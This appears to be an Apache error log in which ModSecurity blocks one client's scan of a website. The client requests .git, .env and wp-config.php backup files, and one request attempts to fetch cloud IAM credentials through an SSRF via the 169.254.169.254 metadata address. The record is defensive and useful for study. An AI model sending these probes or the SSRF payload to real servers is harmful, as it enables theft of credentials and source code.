[Mon May 11 17:35:34.470723 2026] [ssl:error] [pid 1424905:tid 1424917] (EAI 2)Name or service not known: [client 216.157.40.65:13046] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 17:35:34.470780 2026] [ssl:error] [pid 1424905:tid 1424917] AH01941: stapling_renew_response: responder error
[Mon May 11 17:35:35.110060 2026] [ssl:error] [pid 1411099:tid 1411118] (EAI 2)Name or service not known: [client 216.157.40.83:14425] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 17:35:35.110091 2026] [ssl:error] [pid 1411099:tid 1411118] AH01941: stapling_renew_response: responder error
[Mon May 11 17:35:35.437005 2026] [ssl:error] [pid 1416109:tid 1416136] (EAI 2)Name or service not known: [client 216.157.40.91:64708] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 17:35:35.437044 2026] [ssl:error] [pid 1416109:tid 1416136] AH01941: stapling_renew_response: responder error
[Mon May 11 17:35:35.761648 2026] [ssl:error] [pid 1411201:tid 1411267] (EAI 2)Name or service not known: [client 216.157.40.83:34690] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 17:35:35.761699 2026] [ssl:error] [pid 1411201:tid 1411267] AH01941: stapling_renew_response: responder error
[Mon May 11 17:35:36.398200 2026] [ssl:error] [pid 1416109:tid 1416151] (EAI 2)Name or service not known: [client 216.157.40.84:19188] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 17:35:36.398242 2026] [ssl:error] [pid 1416109:tid 1416151] AH01941: stapling_renew_response: responder error
[Mon May 11 17:35:37.056164 2026] [ssl:error] [pid 1411055:tid 1411059] (EAI 2)Name or service not known: [client 216.157.40.84:14494] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 17:35:37.056204 2026] [ssl:error] [pid 1411055:tid 1411059] AH01941: stapling_renew_response: responder error
[Mon May 11 17:35:39.868262 2026] [authz_core:error] [pid 1411201:tid 1411269] [client 176.120.22.46:57191] AH01630: client denied by server configuration: /home/labaujue/public_html/wp-includes/sodium_compat/namespaced/Core/error_log, referer: http://www.labaujue.com/wp-includes/sodium_compat/namespaced/Core/
[Mon May 11 17:35:43.478887 2026] [security2:error] [pid 1416109:tid 1416154] [client 195.178.110.155:14522] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/index"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "missmandarine.com"] [uri "/.git/index"] [unique_id "agH3T1V4kyjgo4bQBUhuEAAAANg"]
[Mon May 11 17:35:43.478894 2026] [security2:error] [pid 1411099:tid 1411112] [client 195.178.110.155:14422] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/iam/security-credentials/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "missmandarine.com"] [uri "/_next/image"] [unique_id "agH3Tw-Qm4vhlWBPlMjScwAAAAw"]
[Mon May 11 17:35:43.479052 2026] [security2:error] [pid 1416109:tid 1416154] [client 195.178.110.155:14522] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "missmandarine.com"] [uri "/.git/index"] [unique_id "agH3T1V4kyjgo4bQBUhuEAAAANg"]
[Mon May 11 17:35:43.479294 2026] [security2:error] [pid 1411201:tid 1411265] [client 195.178.110.155:14414] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "missmandarine.com"] [uri "/backend/.env"] [unique_id "agH3T_y_GXSWIKeli0sNFQAAAJQ"]
[Mon May 11 17:35:43.481581 2026] [security2:error] [pid 1411099:tid 1411112] [client 195.178.110.155:14422] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "missmandarine.com"] [uri "/_next/image"] [unique_id "agH3Tw-Qm4vhlWBPlMjScwAAAAw"]
[Mon May 11 17:35:43.481608 2026] [security2:error] [pid 1411201:tid 1411265] [client 195.178.110.155:14414] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "missmandarine.com"] [uri "/backend/.env"] [unique_id "agH3T_y_GXSWIKeli0sNFQAAAJQ"]
[Mon May 11 17:35:43.482701 2026] [security2:error] [pid 1411055:tid 1411057] [client 195.178.110.155:14490] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "missmandarine.com"] [uri "/.git/config"] [unique_id "agH3T0WKUxpmnkK7zHyWhQAAAQA"]
[Mon May 11 17:35:43.482871 2026] [security2:error] [pid 1411055:tid 1411057] [client 195.178.110.155:14490] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "missmandarine.com"] [uri "/.git/config"] [unique_id "agH3T0WKUxpmnkK7zHyWhQAAAQA"]
[Mon May 11 17:35:43.483280 2026] [security2:error] [pid 1411055:tid 1411067] [client 195.178.110.155:14574] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "missmandarine.com"] [uri "/wp-config.php"] [unique_id "agH3T0WKUxpmnkK7zHyWhgAAAQo"]
[Mon May 11 17:35:43.483428 2026] [security2:error] [pid 1411055:tid 1411067] [client 195.178.110.155:14574] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "missmandarine.com"] [uri "/wp-config.php"] [unique_id "agH3T0WKUxpmnkK7zHyWhgAAAQo"]
[Mon May 11 17:35:43.483767 2026] [security2:error] [pid 1411055:tid 1411078] [client 195.178.110.155:14444] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/refs/heads/master"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "missmandarine.com"] [uri "/.git/refs/heads/master"] [unique_id "agH3T0WKUxpmnkK7zHyWhwAAARU"]
[Mon May 11 17:35:43.483918 2026] [security2:error] [pid 1411055:tid 1411078] [client 195.178.110.155:14444] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "missmandarine.com"] [uri "/.git/refs/heads/master"] [unique_id "agH3T0WKUxpmnkK7zHyWhwAAARU"]
[Mon May 11 17:35:43.485049 2026] [security2:error] [pid 1412074:tid 1412095] [client 195.178.110.155:14556] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "missmandarine.com"] [uri "/wp-config.php.bak"] [unique_id "agH3TzJnyuKVXoStDhbOIQAAAFM"]
[Mon May 11 17:35:43.485209 2026] [security2:error] [pid 1412074:tid 1412095] [client 195.178.110.155:14556] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "missmandarine.com"] [uri "/wp-config.php.bak"] [unique_id "agH3TzJnyuKVXoStDhbOIQAAAFM"]
[Mon May 11 17:35:43.612131 2026] [security2:error] [pid 1411055:tid 1411057] [client 195.178.110.155:14490] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agH3T0WKUxpmnkK7zHyWhQAAAQA"]
[Mon May 11 17:35:43.621872 2026] [security2:error] [pid 1411099:tid 1411112] [client 195.178.110.155:14422] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agH3Tw-Qm4vhlWBPlMjScwAAAAw"]
[Mon May 11 17:35:43.622334 2026] [security2:error] [pid 1411055:tid 1411078] [client 195.178.110.155:14444] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agH3T0WKUxpmnkK7zHyWhwAAARU"]
[Mon May 11 17:35:43.628366 2026] [security2:error] [pid 1411055:tid 1411072] [client 195.178.110.155:14502] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/refs/heads/main"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "missmandarine.com"] [uri "/.git/refs/heads/main"] [unique_id "agH3T0WKUxpmnkK7zHyWiAAAAQ8"]
[Mon May 11 17:35:43.628600 2026] [security2:error] [pid 1411055:tid 1411072] [client 195.178.110.155:14502] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "missmandarine.com"] [uri "/.git/refs/heads/main"] [unique_id "agH3T0WKUxpmnkK7zHyWiAAAAQ8"]
[Mon May 11 17:35:43.640034 2026] [security2:error] [pid 1411055:tid 1411067] [client 195.178.110.155:14574] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agH3T0WKUxpmnkK7zHyWhgAAAQo"]
[Mon May 11 17:35:43.645084 2026] [security2:error] [pid 1411099:tid 1411112] [client 195.178.110.155:14422] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "missmandarine.com"] [uri "/.git/HEAD"] [unique_id "agH3Tw-Qm4vhlWBPlMjSdgAAAAw"]
[Mon May 11 17:35:43.645289 2026] [security2:error] [pid 1411099:tid 1411112] [client 195.178.110.155:14422] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "missmandarine.com"] [uri "/.git/HEAD"] [unique_id "agH3Tw-Qm4vhlWBPlMjSdgAAAAw"]
[Mon May 11 17:35:43.673760 2026] [security2:error] [pid 1412074:tid 1412087] [client 195.178.110.155:14518] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "missmandarine.com"] [uri "/.env.old"] [unique_id "agH3TzJnyuKVXoStDhbOIwAAAEs"]
[Mon May 11 17:35:43.673960 2026] [security2:error] [pid 1412074:tid 1412087] [client 195.178.110.155:14518] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "missmandarine.com"] [uri "/.env.old"] [unique_id "agH3TzJnyuKVXoStDhbOIwAAAEs"]
[Mon May 11 17:35:43.673999 2026] [security2:error] [pid 1411055:tid 1411078] [client 195.178.110.155:14444] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/logs/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "missmandarine.com"] [uri "/.git/logs/HEAD"] [unique_id "agH3T0WKUxpmnkK7zHyWjAAAARU"]
[Mon May 11 17:35:43.674276 2026] [security2:error] [pid 1411055:tid 1411078] [client 195.178.110.155:14444] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "missmandarine.com"] [uri "/.git/logs/HEAD"] [unique_id "agH3T0WKUxpmnkK7zHyWjAAAARU"]
[Mon May 11 17:35:43.708831 2026] [security2:error] [pid 1411055:tid 1411057] [client 195.178.110.155:14490] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "missmandarine.com"] [uri "/wp-config.php~"] [unique_id "agH3T0WKUxpmnkK7zHyWjQAAAQA"]
[Mon May 11 17:35:43.709012 2026] [security2:error] [pid 1411055:tid 1411057] [client 195.178.110.155:14490] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "missmandarine.com"] [uri "/wp-config.php~"] [unique_id "agH3T0WKUxpmnkK7zHyWjQAAAQA"]
[Mon May 11 17:35:43.713826 2026] [security2:error] [pid 1411099:tid 1411112] [client 195.178.110.155:14422] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agH3Tw-Qm4vhlWBPlMjSdgAAAAw"]
[Mon May 11 17:35:43.731343 2026] [security2:error] [pid 1411099:tid 1411112] [client 195.178.110.155:14422] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/commit_editmsg"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "missmandarine.com"] [uri "/.git/COMMIT_EDITMSG"] [unique_id "agH3Tw-Qm4vhlWBPlMjSeAAAAAw"]
[Mon May 11 17:35:43.731486 2026] [security2:error] [pid 1411099:tid 1411112] [client 195.178.110.155:14422] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "missmandarine.com"] [uri "/.git/COMMIT_EDITMSG"] [unique_id "agH3Tw-Qm4vhlWBPlMjSeAAAAAw"]
[Mon May 11 17:35:43.733462 2026] [security2:error] [pid 1411055:tid 1411078] [client 195.178.110.155:14444] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agH3T0WKUxpmnkK7zHyWjAAAARU"]
[Mon May 11 17:35:43.738376 2026] [security2:error] [pid 1416109:tid 1416133] [client 195.178.110.155:14438] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "missmandarine.com"] [uri "/.env.save"] [unique_id "agH3T1V4kyjgo4bQBUhuFAAAAMM"]
[Mon May 11 17:35:43.738550 2026] [security2:error] [pid 1416109:tid 1416133] [client 195.178.110.155:14438] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "missmandarine.com"] [uri "/.env.save"] [unique_id "agH3T1V4kyjgo4bQBUhuFAAAAMM"]
[Mon May 11 17:35:43.773094 2026] [security2:error] [pid 1411055:tid 1411057] [client 195.178.110.155:14490] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agH3T0WKUxpmnkK7zHyWjQAAAQA"]
